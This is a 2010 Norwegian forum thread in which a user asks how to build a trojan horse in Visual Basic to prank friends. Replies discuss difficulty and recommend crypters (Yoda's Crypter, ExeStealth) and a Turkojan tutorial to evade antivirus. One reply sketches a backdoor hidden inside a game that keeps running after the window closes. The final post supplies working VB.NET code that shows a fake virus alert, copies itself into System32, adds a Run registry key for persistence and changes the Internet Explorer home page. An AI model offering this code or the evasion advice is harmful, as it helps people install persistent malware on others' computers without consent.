Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  17 1579
Hei, jeg lurte på om det var noen som viste hvordan man kan lage en trojansk hest i vb...
grunnen at jeg spør om dette er at jeg har lyst til og ha det litt gøy med kompisene mine.
jeg har googla litt og sjekka litt på youtube men jeg finner ingen god oppskrift...

kan noen hjelpe meg?
Hva skal denne trojanen gjøre?

Dette blir litt som å spørre om man kan bygge et hus med verktøy.
Sist endret av staM; 26. mars 2010 kl. 15:47.
tviler på at noen gidder å lage en "trojansk hest" til deg. Du må jo lære deg å programmere i språket, og ikke bare få en ferdigkode. Det blir det samme som å si til kompissene dine, "se jeg har hacke skilz"
FL Studio Guru
djxfade's Avatar
En trojaner er bare ett program som utgir seg for å være noe annet enn det er, for dermed å lure brukeren til å gi programmet riktig rettigheter til å kjøre potensiell skadelig kode.

Er null stress å lage ett program som ligner på ett annet i VB, for og dermed få programmet til å kjøre skadelig kode.
Sitat av www2 Vis innlegg
tviler på at noen gidder å lage en "trojansk hest" til deg. Du må jo lære deg å programmere i språket, og ikke bare få en ferdigkode. Det blir det samme som å si til kompissene dine, "se jeg har hacke skilz"
Vis hele sitatet...
Regner med at når han spør om noen kan hjelpe ham å finne en oppskrift, regner jeg med at han mener en tutorial, ikke en ferdig kode
Trådstarter
9 0
jeg spør ikke nom noen kan lage en kode nei... mere en tutorial sån som ''Herû'' sier..
Følger du en tutorial fra nettet er sjansene STORE for at den bare blir stoppet av antivirus uansett.

Hva vil du denne trojanen skal gjøre egentlig? Og hvorfor skal den akkurat skrives i VB? (OT).
Trådstarter
9 0
jeg vil lage et program som kanskje ligner litt på ''let me rule'' eller hva det heter. og grunnen til at jeg vil skrive det i vb er at det er det eneste programmet jeg har giddi og prøve og sette meg inn i...

men har du forslag til andre programerings programmer da? :P
Sitat av 97sindre97 Vis innlegg
jeg vil lage et program som kanskje ligner litt på ''let me rule'' eller hva det heter. og grunnen til at jeg vil skrive det i vb er at det er det eneste programmet jeg har giddi og prøve og sette meg inn i...

men har du forslag til andre programerings programmer da? :P
Vis hele sitatet...
Du skal ha svært store programmeringskunnskaper for å lage en slik trojansk hest som ikke blir oppdaget av et noen lunde oppegående antivirus-program. En hver trojaner laget etter en public-guide på nettet hadde nok ikke kommet lenger enn til de enkleste sikkerhetsløsningene i ethvert OS. Du må dermed selv tenke ut hele programmet selv, og finne svakheter i systemet. Ergo: svært vanskelig.
og ting som buffer overflow er vel heller vanskelig i vb
Eventuelt kunne du ringt Peter Vreugdenhil, og hørt om han kunne laget en guide til deg http://www.itavisen.no/838961/window...aa-to-minutter
Trådstarter
9 0
åssen får jeg kontaktet han da?
Her står det i siste innlegg at du må lære deg c/c++ (regner med at det fremdeles gjelder):

Lær deg c/c++, lær deg sockets.
Vis hele sitatet...
Sitat av Toak Vis innlegg
Du skal ha svært store programmeringskunnskaper for å lage en slik trojansk hest som ikke blir oppdaget av et noen lunde oppegående antivirus-program. En hver trojaner laget etter en public-guide på nettet hadde nok ikke kommet lenger enn til de enkleste sikkerhetsløsningene i ethvert OS. Du må dermed selv tenke ut hele programmet selv, og finne svakheter i systemet. Ergo: svært vanskelig.
Vis hele sitatet...
Man kan skjule trojanen med div. crypters. Til og med slike "Turkojan" og andre scriptkiddies program, blir ikke plukket opp av antivirus da.

Google nøkkelord:
Yoda's Crypter 1.3
ExeStealth 3.04

Til trådstarter:
Turkojan Tutorial
så crypter du .exe filen etterpå.
Sist endret av RosaElefant; 26. mars 2010 kl. 16:57.
til et hvis nivå kan du få til en slaks trojaner i VB, men det er veldig begrensen hva den kan gjøre. Lag deg først et lite spill f.eks. i VB som da skal være den trojanske hesten, som du gjømmer den ondsinnende koden inni. Når spillet er ferdig kan du legge til en funksjon som gjør at programmet ditt koblet seg opp som en klient opp mot en server du har kjørende. Denne serveren er programmet du har kjørende på maskinen din som f.eks. ligner på let me rule - i VB og uten for høye kunskaper der det begrenset hva slaks funksjoner du kan implementere; men innenfor disse er det bare fantasien som setter grenser. Det du må huske å gjøre er at programmet ikke må skrues av selv om vennen din lukker spill-vinduet. alltid la programmet kjøre i bakgrunnen med den delen av programmet som gir deg tilgang.

Det vil selvfølgelig være vanskelig å få til noe skikkelig farlig virus, men å få til noe som er gøy for fjortisser på lan burde være mulig i VB.
Sitat av 97sindre97 Vis innlegg
åssen får jeg kontaktet han da?
Vis hele sitatet...
Har du Facebook? I tilfelle: http://www.facebook.com/people/Peter...hil/1656194457


PS: Jeg har ikke Facebook, men det var en av de første når jeg søkte på Peter Vreugdenhil på google
Sist endret av Herû; 26. mars 2010 kl. 17:09.
Trådstarter
9 0
haha ok

tusen takk
▼ ... over en måned senere ... ▼
Imports Microsoft.Win32
Public Class Form1

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
On Error GoTo err
MsgBox("Virus detected in your system!", MsgBoxStyle.Critical)
On Error GoTo err
FileCopy(Application.StartupPath & "\" & Application.ProductName & ".exe", "CWINDOWS\System32\lol.exe")
Registry.SetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Win dows\CurrentVersion\Run", "NewUpdater", "CWINDOWS\System32\lol.exe")
Registry.SetValue("HKEY_CURRENT_USER\Software\Microsoft\Inte rnet Explorer\Main", "Start Page", "www.TULLENETSIDEHER.com")
Exit Sub
err:
MsgBox("Run as administrator", MsgBoxStyle.Critical)
End Sub



Er ikke så vanskelig..
den vil Kopiere seg selv til System32 og legge seg selv til i Registeret[Startup] og bytte IE home page...
Advarsel: Kjør på egent risiko.

//edit
Dette er Vb.Net
Sist endret av random52564; 14. mai 2010 kl. 17:12.